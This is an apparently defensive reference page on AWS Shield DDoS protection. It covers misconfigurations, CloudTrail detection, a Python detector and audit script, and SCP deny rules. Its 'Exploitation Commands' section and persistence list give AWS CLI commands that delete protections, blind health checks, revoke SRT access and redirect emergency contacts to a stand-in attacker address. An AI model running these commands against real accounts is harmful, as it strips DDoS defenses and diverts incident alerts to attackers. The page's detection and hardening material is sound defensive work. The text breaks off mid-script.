<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>AWS Shield Security | AWS Security Cards</title>
<meta name="description" content="AWS Shield provides DDoS protection at two tiers: Standard (free, Layer 3/4) and Advanced (paid, Layer 7 with SRT access and cost protection).">
<style>
*, *::before, *::after { box-sizing: border-box; margin: 0; padding: 0; }
body {
font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, 'Helvetica Neue', sans-serif;
background: #0a0e1a;
color: #e2e8f0;
line-height: 1.6;
padding: 2rem;
max-width: 1200px;
margin: 0 auto;
}
a { color: #22d3ee; text-decoration: none; }
a:hover { text-decoration: underline; }
/* Card Image */
.card-image {
border-radius: 1rem;
overflow: hidden;
margin-bottom: 2rem;
border: 1px solid rgba(255,255,255,0.1);
}
.card-image img {
width: 100%;
height: auto;
display: block;
}
/* Header */
.header {
position: relative;
overflow: hidden;
border-radius: 1rem;
background: linear-gradient(135deg, #3b82f615, #0a0e1a, #0ea5e915);
border: 1px solid #3b82f64d;
padding: 2.5rem;
margin-bottom: 2rem;
}
.header::before {
content: '';
position: absolute;
top: 0; right: 0;
width: 24rem; height: 24rem;
background: #3b82f60d;
border-radius: 50%;
filter: blur(3rem);
}
.header-content { position: relative; display: flex; align-items: flex-start; gap: 1.5rem; }
.header-icon { width: 64px; height: 64px; flex-shrink: 0; }
.header-icon img { width: 100%; height: 100%; }
.header-title { font-size: 1.875rem; font-weight: 700; color: #fff; }
.header-badge {
display: inline-block;
padding: 0.25rem 0.75rem;
background: #3b82f633;
color: #3b82f6;
font-size: 0.8rem;
font-weight: 600;
border-radius: 999px;
border: 1px solid #3b82f64d;
margin-left: 0.75rem;
vertical-align: middle;
}
.header-desc { color: #94a3b8; max-width: 42rem; margin-top: 0.5rem; }
/* Stats */
.stats-row { display: grid; grid-template-columns: repeat(4, 1fr); gap: 1rem; margin-bottom: 2rem; }
.stat-card {
background: rgba(255,255,255,0.03);
border-radius: 0.5rem;
border: 1px solid rgba(255,255,255,0.06);
padding: 1rem;
text-align: center;
}
.stat-value { font-size: 1.5rem; font-weight: 700; }
.stat-label { font-size: 0.8rem; color: #94a3b8; }
/* Sections */
.section {
background: rgba(255,255,255,0.03);
border-radius: 0.75rem;
border: 1px solid rgba(255,255,255,0.06);
padding: 1.5rem;
margin-bottom: 1.5rem;
}
.section h2 {
font-size: 1.25rem;
font-weight: 700;
color: #fff;
margin-bottom: 1rem;
display: flex;
align-items: center;
gap: 0.5rem;
}
/* Overview */
.overview-grid { display: grid; grid-template-columns: 1fr 1fr; gap: 1.5rem; }
.overview-grid h4 { font-size: 0.9rem; font-weight: 600; margin-bottom: 0.5rem; }
.overview-grid p { font-size: 0.875rem; color: #94a3b8; margin-bottom: 0.75rem; }
.attack-note {
background: rgba(0,0,0,0.3);
border-radius: 0.5rem;
border: 1px solid rgba(255,255,255,0.06);
padding: 0.75rem;
font-size: 0.875rem;
color: #cbd5e1;
}
/* Risk Gauge */
.risk-gauge { display: flex; align-items: center; gap: 2rem; }
.risk-bar-container { flex: 1; }
.risk-bar {
height: 1rem;
background: #0f172a;
border-radius: 999px;
overflow: hidden;
}
.risk-bar-fill {
height: 100%;
border-radius: 999px;
background: linear-gradient(90deg, #eab308, #f97316, #ef4444);
}
.risk-labels { display: flex; justify-content: space-between; font-size: 0.8rem; color: #94a3b8; margin-top: 0.5rem; }
.risk-score { text-align: center; }
.risk-score-value { font-size: 2.5rem; font-weight: 700; color: #f87171; }
.risk-score-label { font-size: 0.8rem; color: #94a3b8; }
.risk-desc { margin-top: 1rem; font-size: 0.875rem; color: #94a3b8; }
/* Panels Grid */
.panels-grid { display: grid; grid-template-columns: repeat(3, 1fr); gap: 1.5rem; margin-bottom: 1.5rem; }
@media (max-width: 1024px) { .panels-grid { grid-template-columns: repeat(2, 1fr); } }
@media (max-width: 640px) { .panels-grid, .stats-row, .overview-grid { grid-template-columns: 1fr; } }
.panel {
background: rgba(255,255,255,0.03);
border-radius: 0.75rem;
border: 1px solid;
padding: 1.5rem;
}
.panel h3 { font-size: 1.1rem; font-weight: 700; margin-bottom: 1rem; display: flex; align-items: center; gap: 0.5rem; }
.panel h4 { font-size: 0.85rem; font-weight: 600; margin-bottom: 0.5rem; margin-top: 1rem; }
.panel ul { list-style: none; padding: 0; }
.panel li {
font-size: 0.85rem;
color: #cbd5e1;
padding: 0.15rem 0;
display: flex;
align-items: flex-start;
gap: 0.5rem;
}
.bullet { margin-top: 0.15rem; }
.note {
margin-top: 1rem;
padding: 0.75rem;
border-radius: 0.5rem;
font-size: 0.85rem;
}
/* Commands */
.cmd-grid { display: grid; grid-template-columns: 1fr 1fr; gap: 1rem; }
.cmd-block { margin-top: 0.75rem; }
.cmd-title { font-size: 0.8rem; color: #94a3b8; margin-bottom: 0.25rem; }
pre {
background: rgba(0,0,0,0.5);
border-radius: 0.5rem;
padding: 0.75rem;
font-size: 0.8rem;
color: #4ade80;
overflow-x: auto;
border: 1px solid rgba(255,255,255,0.06);
white-space: pre-wrap;
word-break: break-all;
font-family: 'SF Mono', 'Fira Code', 'Cascadia Code', monospace;
}
/* Policies */
.policy-grid { display: grid; grid-template-columns: 1fr 1fr; gap: 1.5rem; }
.policy-card {
border-radius: 0.5rem;
border: 1px solid;
padding: 1rem;
}
.policy-header { display: flex; align-items: center; gap: 0.5rem; margin-bottom: 0.75rem; font-size: 0.9rem; }
.policy-card pre { margin-bottom: 0.75rem; color: #cbd5e1; }
.policy-desc { font-size: 0.8rem; color: #94a3b8; }
/* Defenses */
.defense-grid { display: grid; grid-template-columns: 1fr 1fr; gap: 1rem; }
.defense-card {
background: rgba(255,255,255,0.03);
border-radius: 0.5rem;
border: 1px solid rgba(255,255,255,0.06);
padding: 1rem;
}
.defense-card:hover { border-color: #22d3ee4d; }
.defense-header { display: flex; align-items: flex-start; gap: 0.75rem; }
.defense-icon { font-size: 1.5rem; }
.defense-card h4 { font-size: 0.9rem; font-weight: 600; color: #fff; margin-bottom: 0.25rem; }
.defense-card p { font-size: 0.85rem; color: #94a3b8; margin-bottom: 0.5rem; }
.defense-card pre { color: #22d3ee; }
/* Footer */
.footer { text-align: center; padding: 1.5rem 0; font-size: 0.8rem; color: #64748b; }
.footer a { color: #22d3ee; }
/* Prevent ugly page-break splits */
.card-image,
.header,
.stat-card,
.stats-row,
.section,
.panel,
.cmd-block,
.policy-card,
.defense-card,
.attack-note,
.overview-grid > div,
.risk-gauge,
.note {
break-inside: avoid;
page-break-inside: avoid;
}
.section,
.panels-grid,
.card-image,
.header {
break-before: auto;
page-break-before: auto;
}
/* Keep headings with their content */
h2, h3, h4 {
break-after: avoid;
page-break-after: avoid;
}
@media print {
body { background: #0a0e1a; -webkit-print-color-adjust: exact; print-color-adjust: exact; }
.panels-grid { grid-template-columns: repeat(2, 1fr); }
.cmd-grid { grid-template-columns: 1fr; }
.policy-grid { grid-template-columns: 1fr; }
.defense-grid { grid-template-columns: 1fr; }
}
</style>
</head>
<body>
<!-- Card Image -->
<div class="card-image">
<img src="../images/shield-card.webp" alt="AWS Shield Security" />
</div>
<!-- Header -->
<div class="header">
<div class="header-content">
<div class="header-icon"><img src="../icons/shield.svg" alt="AWS Shield Security" /></div>
<div>
<div>
<span class="header-title">AWS Shield Security</span>
<span class="header-badge">NETWORKING</span>
</div>
<p class="header-desc">AWS Shield provides DDoS protection at two tiers. Shield Standard defends against Layer 3/4 DDoS attacks for free. Shield Advanced extends protection with Layer 7 mitigation, SRT access, cost protection, and proactive engagement. An attacker with account access can disable protections to amplify external DDoS impact.</p>
</div>
</div>
</div>
<!-- Stats -->
<div class="stats-row">
<div class="stat-card">
<div class="stat-value" style="color: #f87171;">HIGH</div>
<div class="stat-label">Risk Level</div>
</div>
<div class="stat-card">
<div class="stat-value" style="color: #4ade80;">Global+Regional</div>
<div class="stat-label">Scope</div>
</div>
<div class="stat-card">
<div class="stat-value" style="color: #60a5fa;">L3/L4/L7</div>
<div class="stat-label">Protection</div>
</div>
<div class="stat-card">
<div class="stat-value" style="color: #c084fc;">$3K/mo</div>
<div class="stat-label">Advanced Cost</div>
</div></div>
<!-- Overview -->
<div class="section"><h2><span style="color:#3b82f6;">📋</span> Service Overview</h2><div class="overview-grid">
<div>
<h4 style="color: #3b82f6;">Shield Standard vs Advanced</h4>
<p>Shield Standard is automatic and free for all AWS customers, covering Layer 3/4. Shield Advanced ($3,000/month) adds Layer 7 mitigation, SRT access, cost protection, health-based detection, and proactive engagement.</p>
<div class="attack-note"><span style="color:#3b82f6;">Attack note:</span> Shield Standard mitigates only Layer 3/4 events. Without Shield Advanced there is no Shield-managed application-layer mitigation and no SRT: an HTTP request flood reaches the origin unless you have already put an AWS WAF web ACL with rate-based rules in front of it yourself. Attackers who fingerprint a Standard-only target favor Layer 7 for exactly this reason.</div>
</div>
<div>
<h4 style="color: #3b82f6;">DDoS Attack Vectors Addressed</h4>
<p>Protects against UDP reflection, SYN floods, DNS amplification, HTTP request floods, and HTTP/2 rapid reset attacks. Shield Advanced subscribers get 24/7 SRT access and automatic application-layer mitigation via AWS WAF.</p>
<div class="attack-note"><span style="color:#3b82f6;">Attack note:</span> A principal holding shield:DeleteProtection, shield:DisassociateHealthCheck, or shield:DisableProactiveEngagement can strip per-resource protections, blind health-based detection, and stop the SRT from reaching out, then hand the exposed target to an external DDoS. Account compromise becomes a DDoS force multiplier, and nothing alerts on these calls unless you build the CloudTrail detections yourself.</div>
</div></div></div>
<!-- Risk Assessment -->
<div class="section">
<h2>Security Risk Assessment</h2>
<div class="risk-gauge">
<div class="risk-bar-container">
<div class="risk-bar">
<div class="risk-bar-fill" style="width: 70%;"></div>
</div>
<div class="risk-labels"><span>Low</span><span>Medium</span><span>High</span><span>Critical</span></div>
</div>
<div class="risk-score">
<div class="risk-score-value">7.0</div>
<div class="risk-score-label">Risk Score</div>
</div>
</div>
<p class="risk-desc">Shield Standard is automatic, reducing baseline risk. However, organizations without Shield Advanced lack Layer 7 DDoS protection, cost protection, and SRT access. Misconfigured Shield Advanced (missing health checks, no proactive engagement) creates a false sense of security.</p>
</div>
<!-- Main Panels -->
<div class="panels-grid">
<div class="panel" style="border-color: #f8717133;">
<h3 style="color: #f87171;">⚔️ Attack Vectors</h3><h4 style="color: #f87171;">External DDoS Attack Types</h4><ul><li><span class="bullet" style="color: #f87171;">•</span> UDP reflection/amplification (DNS, NTP, memcached)</li><li><span class="bullet" style="color: #f87171;">•</span> SYN flood to exhaust TCP connection state tables</li><li><span class="bullet" style="color: #f87171;">•</span> HTTP request flood (automatic mitigation needs Shield Advanced plus a WAF web ACL)</li><li><span class="bullet" style="color: #f87171;">•</span> DNS query flood against Route 53 hosted zones</li><li><span class="bullet" style="color: #f87171;">•</span> HTTP/2 rapid reset attack</li></ul><h4 style="color: #f87171;">Account-Level Attack Vectors</h4><ul><li><span class="bullet" style="color: #f87171;">•</span> shield:DeleteProtection removes DDoS protection from a resource</li><li><span class="bullet" style="color: #f87171;">•</span> shield:DisassociateHealthCheck blinds health-based detection</li><li><span class="bullet" style="color: #f87171;">•</span> shield:DisableProactiveEngagement prevents SRT contact</li><li><span class="bullet" style="color: #f87171;">•</span> shield:DisassociateDRTRole revokes SRT access</li><li><span class="bullet" style="color: #f87171;">•</span> shield:UpdateSubscription with AutoRenew=DISABLED lets the subscription lapse at the end of its one-year term</li></ul></div>
<div class="panel" style="border-color: #fb923c33;">
<h3 style="color: #fb923c;">⚠️ Misconfigurations</h3><h4 style="color: #fb923c;">Protection Coverage Gaps</h4><ul><li><span class="bullet" style="color: #fb923c;">•</span> Internet-facing resources not added to Shield Advanced (Standard covers nothing at Layer 7)</li><li><span class="bullet" style="color: #fb923c;">•</span> No Route 53 health checks associated with protections</li><li><span class="bullet" style="color: #fb923c;">•</span> Proactive engagement not enabled</li><li><span class="bullet" style="color: #fb923c;">•</span> Emergency contacts not configured</li><li><span class="bullet" style="color: #fb923c;">•</span> Protection groups not defined</li></ul><h4 style="color: #fb923c;">Operational Issues</h4><ul><li><span class="bullet" style="color: #fb923c;">•</span> No WAF web ACL on CloudFront/ALB resources, so automatic L7 mitigation cannot be enabled</li><li><span class="bullet" style="color: #fb923c;">•</span> DRT role not granted, so the SRT cannot apply mitigations on your behalf</li><li><span class="bullet" style="color: #fb923c;">•</span> DRT log bucket not associated, so the SRT cannot inspect flow/WAF logs</li><li><span class="bullet" style="color: #fb923c;">•</span> Shield Advanced without Business or Enterprise Support (required for SRT engagement)</li><li><span class="bullet" style="color: #fb923c;">•</span> No Firewall Manager policy for multi-account rollout</li></ul></div>
<div class="panel" style="border-color: #22d3ee33;">
<h3 style="color: #22d3ee;">🔍 Enumeration</h3><div class="cmd-block">
<div class="cmd-title">Check Subscription Status</div>
<pre><code>aws shield get-subscription-state</code></pre>
</div><div class="cmd-block">
<div class="cmd-title">Describe Subscription Details</div>
<pre><code>aws shield describe-subscription</code></pre>
</div><div class="cmd-block">
<div class="cmd-title">List All Protected Resources</div>
<pre><code>aws shield list-protections</code></pre>
</div><div class="cmd-block">
<div class="cmd-title">List Recent DDoS Attacks</div>
<pre><code>aws shield list-attacks \
--start-time FromInclusive=2026-01-01T00:00:00Z,ToExclusive=2026-03-30T00:00:00Z</code></pre>
</div><div class="cmd-block">
<div class="cmd-title">Check DRT Access Configuration</div>
<pre><code>aws shield describe-drt-access</code></pre>
</div></div>
<div class="panel" style="border-color: #c084fc33;">
<h3 style="color: #c084fc;">📈 Privilege Escalation</h3><h4 style="color: #c084fc;">Direct Escalation Paths</h4><ul><li><span class="bullet" style="color: #c084fc;">•</span> shield:CreateSubscription alone commits the account to $3K/month for one year; shield:CreateProtection adds per-resource data-transfer fees</li><li><span class="bullet" style="color: #c084fc;">•</span> shield:AssociateDRTRole grants the SRT whatever the passed role allows</li><li><span class="bullet" style="color: #c084fc;">•</span> shield:AssociateDRTLogBucket grants the SRT read access to the named S3 bucket (bucket policy permitting)</li><li><span class="bullet" style="color: #c084fc;">•</span> iam:PassRole + shield:AssociateDRTRole passes a privileged role to the SRT</li></ul><h4 style="color: #c084fc;">Indirect Escalation Paths</h4><ul><li><span class="bullet" style="color: #c084fc;">•</span> shield:DeleteProtection + external DDoS for availability and financial damage</li><li><span class="bullet" style="color: #c084fc;">•</span> shield:UpdateEmergencyContactSettings redirects SRT escalations to attacker-controlled contacts</li><li><span class="bullet" style="color: #c084fc;">•</span> shield:EnableApplicationLayerAutomaticResponse with a Block action on an attacker-tampered web ACL</li></ul></div>
<div class="panel" style="border-color: #facc1533;">
<h3 style="color: #facc15;">🔗 Persistence</h3><h4 style="color: #facc15;">Disabling Defenses</h4><ul><li><span class="bullet" style="color: #facc15;">•</span> Delete protections from critical resources before attack</li><li><span class="bullet" style="color: #facc15;">•</span> Disassociate health checks to blind detection</li><li><span class="bullet" style="color: #facc15;">•</span> Disable proactive engagement to prevent SRT contact</li><li><span class="bullet" style="color: #facc15;">•</span> Revoke DRT role access during active attack</li><li><span class="bullet" style="color: #facc15;">•</span> Set AutoRenew=DISABLED to prevent subscription renewal</li></ul><h4 style="color: #facc15;">Maintaining Access</h4><ul><li><span class="bullet" style="color: #facc15;">•</span> Redirect emergency contacts to attacker email</li><li><span class="bullet" style="color: #facc15;">•</span> Associate DRT log bucket to sensitive data</li><li><span class="bullet" style="color: #facc15;">•</span> Modify application-layer automatic response rules</li><li><span class="bullet" style="color: #facc15;">•</span> Remove protection groups to degrade detection</li></ul></div>
<div class="panel" style="border-color: #4ade8033;">
<h3 style="color: #4ade80;">🛡️ Detection</h3><h4 style="color: #4ade80;">CloudTrail Events (eventSource shield.amazonaws.com)</h4><ul><li><span class="bullet" style="color: #4ade80;">•</span> DeleteProtection - protection removed</li><li><span class="bullet" style="color: #4ade80;">•</span> DisassociateHealthCheck - health check removed</li><li><span class="bullet" style="color: #4ade80;">•</span> DisableProactiveEngagement - SRT contact blocked</li><li><span class="bullet" style="color: #4ade80;">•</span> DisassociateDRTRole - SRT access revoked</li><li><span class="bullet" style="color: #4ade80;">•</span> UpdateSubscription - alert when AutoRenew is set to DISABLED</li><li><span class="bullet" style="color: #4ade80;">•</span> UpdateEmergencyContactSettings - escalation contacts changed</li></ul><h4 style="color: #4ade80;">CloudWatch Metrics (AWS/DDoSProtection namespace)</h4><ul><li><span class="bullet" style="color: #4ade80;">•</span> DDoSDetected - active DDoS attack</li><li><span class="bullet" style="color: #4ade80;">•</span> DDoSAttackBitsPerSecond - volumetric attack rate</li><li><span class="bullet" style="color: #4ade80;">•</span> DDoSAttackPacketsPerSecond - packet flood rate</li><li><span class="bullet" style="color: #4ade80;">•</span> DDoSAttackRequestsPerSecond - request flood rate</li></ul></div></div>
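<!-- Worked Example: CloudTrail detection -->
<div class="section"><h2><span style="color:#4ade80;">🔎</span> Worked Example: Detecting Shield Defanging in CloudTrail</h2>
<p>The Detection panel above lists the CloudTrail event names to watch. The script below is an added example written for this card, not AWS code: it scans CloudTrail records from the shield.amazonaws.com event source, flags the defense-weakening calls, and treats UpdateSubscription as a finding only when it turns auto-renew off. Shield is a global service whose calls are recorded in us-east-1, so a detection scoped to your workload region will miss them. The records in SAMPLE_RECORDS are constructed, the principal names in them are made up, and the requestParameters key casing is an assumption (the lookup is case-insensitive to be safe). DEFANGING_EVENTS, classify and scan are names chosen here.</p>

```python
"""Flag CloudTrail events that weaken AWS Shield Advanced defenses.

Added example for this security card; not AWS code. The records below are
constructed to look like CloudTrail entries for the shield.amazonaws.com event
source. The casing of requestParameters keys is an assumption, so lookups are
case-insensitive.
"""
import json

# eventName -> (severity, why it matters). Mirrors the Detection panel.
DEFANGING_EVENTS = {
    "DeleteProtection": ("HIGH", "per-resource DDoS protection removed"),
    "DisassociateHealthCheck": ("HIGH", "health-based detection blinded"),
    "DisableProactiveEngagement": ("HIGH", "SRT can no longer contact you"),
    "DisassociateDRTRole": ("HIGH", "SRT access revoked"),
    "DisassociateDRTLogBucket": ("MEDIUM", "SRT loses traffic log visibility"),
    "UpdateEmergencyContactSettings": ("MEDIUM", "escalation contacts changed"),
    "DeleteProtectionGroup": ("MEDIUM", "cross-resource detection degraded"),
}


def _param(record, name):
    """Case-insensitive lookup in requestParameters (key casing is an assumption)."""
    params = record.get("requestParameters") or {}
    for key, value in params.items():
        if key.lower() == name.lower():
            return value
    return None


def classify(record):
    """Return (severity, reason) if the record is a Shield defanging call, else None."""
    if record.get("eventSource") != "shield.amazonaws.com":
        return None
    name = record.get("eventName", "")
    if name in DEFANGING_EVENTS:
        return DEFANGING_EVENTS[name]
    # UpdateSubscription is routine unless it switches auto-renew off.
    if name == "UpdateSubscription" and str(_param(record, "autoRenew")).upper() == "DISABLED":
        return ("MEDIUM", "subscription set to lapse at end of term")
    return None


def scan(records):
    """Return one finding dict per defanging call found in a list of CloudTrail records."""
    findings = []
    for rec in records:
        hit = classify(rec)
        if hit is None:
            continue
        severity, reason = hit
        findings.append({
            "time": rec.get("eventTime"),
            "event": rec["eventName"],
            "actor": (rec.get("userIdentity") or {}).get("arn"),
            "sourceIp": rec.get("sourceIPAddress"),
            "protectionId": _param(rec, "protectionId"),
            "severity": severity,
            "reason": reason,
        })
    return findings


# Constructed sample records (not real CloudTrail data; identities are made up).
SAMPLE_RECORDS = [
    {"eventTime": "2026-02-01T10:00:00Z", "eventSource": "shield.amazonaws.com",
     "eventName": "ListProtections", "awsRegion": "us-east-1",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:role/SecAudit"},
     "sourceIPAddress": "203.0.113.10", "requestParameters": None},
    {"eventTime": "2026-02-01T10:05:00Z", "eventSource": "shield.amazonaws.com",
     "eventName": "DeleteProtection", "awsRegion": "us-east-1",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/ops-bob"},
     "sourceIPAddress": "198.51.100.7",
     "requestParameters": {"protectionId": "abc123-def456"}},
    {"eventTime": "2026-02-01T10:06:00Z", "eventSource": "shield.amazonaws.com",
     "eventName": "UpdateSubscription", "awsRegion": "us-east-1",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:user/ops-bob"},
     "sourceIPAddress": "198.51.100.7",
     "requestParameters": {"autoRenew": "DISABLED"}},
    {"eventTime": "2026-02-01T10:07:00Z", "eventSource": "shield.amazonaws.com",
     "eventName": "UpdateSubscription", "awsRegion": "us-east-1",
     "userIdentity": {"arn": "arn:aws:iam::123456789012:role/Billing"},
     "sourceIPAddress": "203.0.113.10",
     "requestParameters": {"autoRenew": "ENABLED"}},
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_RECORDS):
        print(json.dumps(finding))
```

<p>Feed scan() the "Records" array of a CloudTrail log file or the events returned by lookup-events; each finding prints as one JSON line, ready for SIEM ingestion. The ListProtections read and the ENABLED auto-renew update are deliberately ignored so the rule does not page on normal audit activity.</p>
</div>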
<!-- Exploitation -->
<div class="section"><h2><span style="color:#f87171;">💻</span> Exploitation Commands</h2><div class="cmd-grid"><div class="cmd-block">
<div class="cmd-title">Remove Protection from Resource</div>
<pre><code>aws shield delete-protection \
--protection-id abc123-def456</code></pre>
</div><div class="cmd-block">
<div class="cmd-title">Disassociate Health Check</div>
<pre><code>aws shield disassociate-health-check \
--protection-id abc123-def456 \
--health-check-arn arn:aws:route53:::healthcheck/12345678</code></pre>
</div><div class="cmd-block">
<div class="cmd-title">Disable Proactive Engagement</div>
<pre><code>aws shield disable-proactive-engagement</code></pre>
</div><div class="cmd-block">
<div class="cmd-title">Revoke DRT Role Access</div>
<pre><code>aws shield disassociate-drt-role</code></pre>
</div><div class="cmd-block">
<div class="cmd-title">Redirect Emergency Contacts</div>
<pre><code>aws shield update-emergency-contact-settings \
--emergency-contact-list EmailAddress=attacker@evil.com</code></pre>
</div><div class="cmd-block">
<div class="cmd-title">Disable Auto-Renew</div>
<pre><code>aws shield update-subscription \
--auto-renew DISABLED</code></pre>
</div></div></div>
<!-- Policies -->
<div class="section"><h2><span style="color:#4ade80;">📜</span> Policy Examples</h2><div class="policy-grid"><div class="policy-card" style="border-color: #ef444433; background: rgba(239,68,68,0.05);">
<div class="policy-header">
<span style="color: #f87171; font-size: 1.2em;">✗</span>
<span style="color: #f87171; font-weight: 600;">Dangerous - Full Shield Access</span>
</div>
<pre><code>{
"Effect": "Allow",
"Action": "shield:*",
"Resource": "*"
}</code></pre>
<p class="policy-desc">Allows removing protections, revoking DRT access, and fully dismantling DDoS defenses</p>
</div><div class="policy-card" style="border-color: #22c55e33; background: rgba(34,197,94,0.05);">
<div class="policy-header">
<span style="color: #4ade80; font-size: 1.2em;">✓</span>
<span style="color: #4ade80; font-weight: 600;">Secure - Read-Only Monitoring</span>
</div>
<pre><code>{
"Effect": "Allow",
"Action": [
"shield:Describe*",
"shield:List*",
"shield:GetSubscriptionState"
],
"Resource": "*"
}</code></pre>
<p class="policy-desc">Visibility into protections and attack events without ability to modify defenses</p>
</div><div class="policy-card" style="border-color: #22c55e33; background: rgba(34,197,94,0.05);">
<div class="policy-header">
<span style="color: #4ade80; font-size: 1.2em;">✓</span>
<span style="color: #4ade80; font-weight: 600;">Secure - SCP Prevent Disabling</span>
</div>
<pre><code>{
"Effect": "Deny",
"Action": [
"shield:DeleteProtection",
"shield:DisableProactiveEngagement",
"shield:DisassociateDRTRole",
"shield:DisassociateHealthCheck"
],
"Resource": "*"
}</code></pre>
<p class="policy-desc">Prevents member-account principals from removing protections or revoking SRT access. Extend the deny list with shield:UpdateSubscription, shield:UpdateEmergencyContactSettings, shield:DisassociateDRTLogBucket and shield:DeleteProtectionGroup, and remember that SCPs never apply to the organization's management account.</p>
</div></div></div>
<!-- Defenses -->
<div class="section"><h2><span style="color:#4ade80;">🛡️</span> Defense Recommendations</h2><div class="defense-grid"><div class="defense-card">
<div class="defense-header">
<span class="defense-icon">🛡️</span>
<div>
<h4>Enable Shield Advanced on All Resources</h4>
<p>Shield Advanced protects CloudFront distributions, Route 53 hosted zones, Global Accelerator accelerators, ALBs, and Elastic IPs (which is how EC2 instances and NLBs are covered). Add an explicit protection for every internet-facing one; an unprotected resource gets Standard's Layer 3/4 coverage only.</p>
<pre><code>aws shield create-protection \
--name "prod-alb" \
--resource-arn arn:aws:elasticloadbalancing:us-east-1:123456789012:loadbalancer/app/prod-alb/1234</code></pre>
</div>
</div>
</div><div class="defense-card">
<div class="defense-header">
<span class="defense-icon">❤️</span>
<div>
<h4>Associate Route 53 Health Checks</h4>
<p>Health checks enable faster, more accurate detection and are required for proactive engagement. Point the check at the resource's real availability signal (an application endpoint, not bare TCP reachability); a check that never fails adds nothing to detection.</p>
<pre><code>aws shield associate-health-check \
--protection-id abc123-def456 \
--health-check-arn arn:aws:route53:::healthcheck/12345678</code></pre>
</div>
</div>
</div><div class="defense-card">
<div class="defense-header">
<span class="defense-icon">📞</span>
<div>
<h4>Enable Proactive Engagement</h4>
<p>Lets the SRT contact you during detected events. First-time setup goes through associate-proactive-engagement-details with your emergency contact list; enable-proactive-engagement only re-enables after a disable. Requires Business or Enterprise Support and a health check on at least one protection.</p>
<pre><code>aws shield enable-proactive-engagement</code></pre>
</div>
</div>
</div><div class="defense-card">
<div class="defense-header">
<span class="defense-icon">🔐</span>
<div>
<h4>Grant DRT Access with Scoped Role</h4>
<p>Give the SRT the access it needs to apply mitigations on your behalf without over-privileging: the role must trust drt.shield.amazonaws.com and should carry only the AWSShieldDRTAccessPolicy managed policy (Shield and WAF actions), nothing broader.</p>
<pre><code>aws shield associate-drt-role \
--role-arn arn:aws:iam::123456789012:role/AWSSRTAccessRole</code></pre>
</div>
</div>
</div><div class="defense-card">
<div class="defense-header">
<span class="defense-icon">🤖</span>
<div>
<h4>Enable Auto Application-Layer Mitigation</h4>
<p>Requires Shield Advanced protection on the resource and an AWS WAF web ACL associated with it. Start with --action Count={} to see what the Shield-managed rule group would block, then switch to Block={} once you are satisfied it does not hit legitimate traffic.</p>
<pre><code>aws shield enable-application-layer-automatic-response \
--resource-arn RESOURCE_ARN \
--action Block={}</code></pre>
</div>
</div>
</div><div class="defense-card">
<div class="defense-header">
<span class="defense-icon">📊</span>
<div>
<h4>Create Protection Groups</h4>
<p>Group related resources so Shield Advanced can detect distributed attacks across multiple endpoints. With --pattern ARBITRARY the member ARNs are mandatory (below, the ALB protected earlier on this card); --pattern ALL or BY_RESOURCE_TYPE takes no member list. Use SUM when the members serve one application and share its traffic, MEAN when traffic is spread roughly evenly across them, MAX when their traffic profiles differ.</p>
<pre><code>aws shield create-protection-group \
--protection-group-id "prod-web-tier" \
--aggregation SUM \
--pattern ARBITRARY \
--members arn:aws:elasticloadbalancing:us-east-1:123456789012:loadbalancer/app/prod-alb/1234</code></pre>
</div>
</div>
</div></div></div>
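<!-- Worked Example: coverage audit -->
<div class="section"><h2><span style="color:#4ade80;">📊</span> Worked Example: Auditing Shield Advanced Coverage</h2>
<p>The Misconfigurations panel and the defense steps above describe what a correctly protected resource looks like: an explicit protection, an associated health check, and automatic application-layer response on Layer 7 resources. The script below is an added example for this card, not AWS tooling: it takes an inventory of internet-facing resource ARNs and a list-protections response and reports every gap. INVENTORY and PROTECTIONS are constructed data shaped like the real API output (in practice you would gather the inventory from the elbv2, ec2, cloudfront and route53 APIs and fetch PROTECTIONS with aws shield list-protections); audit, is_clean, PROTECTABLE_PREFIXES and LAYER7_MARKERS are names chosen here.</p>

```python
"""Audit AWS Shield Advanced coverage from list-protections output.

Added example for this security card; not AWS code. INVENTORY is a constructed
list of internet-facing resource ARNs and PROTECTIONS a constructed response in
the shape returned by `aws shield list-protections`.
"""
import json

# ARN prefixes of resource types Shield Advanced can protect.
PROTECTABLE_PREFIXES = (
    "arn:aws:cloudfront::",
    "arn:aws:route53:::hostedzone/",
    "arn:aws:globalaccelerator::",
    "arn:aws:elasticloadbalancing:",
    "arn:aws:ec2:",  # Elastic IP allocations (eip-allocation/eipalloc-...)
)

# ARN fragments identifying Layer 7 resources where a web ACL and
# automatic application-layer response are expected.
LAYER7_MARKERS = ("arn:aws:cloudfront::", ":loadbalancer/app/")


def audit(inventory, protections):
    """Return a dict of gaps: protectable resources with no protection,
    protections with no health check, and L7 resources whose
    application-layer automatic response is not ENABLED."""
    by_arn = {p["ResourceArn"]: p for p in protections.get("Protections", [])}
    findings = {"unprotected": [], "no_health_check": [], "no_auto_l7": []}
    for arn in inventory:
        if not arn.startswith(PROTECTABLE_PREFIXES):
            continue  # not a Shield Advanced resource type; out of scope
        prot = by_arn.get(arn)
        if prot is None:
            findings["unprotected"].append(arn)
            continue
        if not prot.get("HealthCheckIds"):
            findings["no_health_check"].append(prot["Id"])
        if any(marker in arn for marker in LAYER7_MARKERS):
            cfg = prot.get("ApplicationLayerAutomaticResponseConfiguration") or {}
            if cfg.get("Status") != "ENABLED":
                findings["no_auto_l7"].append(arn)
    return findings


def is_clean(findings):
    """True when the audit produced no gaps at all."""
    return not any(findings.values())


# Constructed inventory; the first ALB ARN is the one used elsewhere on this card.
INVENTORY = [
    "arn:aws:elasticloadbalancing:us-east-1:123456789012:loadbalancer/app/prod-alb/1234",
    "arn:aws:elasticloadbalancing:us-east-1:123456789012:loadbalancer/app/staging-alb/5678",
    "arn:aws:ec2:us-east-1:123456789012:eip-allocation/eipalloc-0abc",
    "arn:aws:s3:::public-assets",  # S3 is not a Shield Advanced resource type; ignored
]

# Constructed list-protections response.
PROTECTIONS = {"Protections": [
    {"Id": "abc123-def456", "Name": "prod-alb",
     "ResourceArn": INVENTORY[0], "HealthCheckIds": ["12345678"],
     "ApplicationLayerAutomaticResponseConfiguration": {
         "Status": "ENABLED", "Action": {"Block": {}}}},
    {"Id": "eip-prot-1", "Name": "bastion-eip",
     "ResourceArn": INVENTORY[2], "HealthCheckIds": []},
]}

if __name__ == "__main__":
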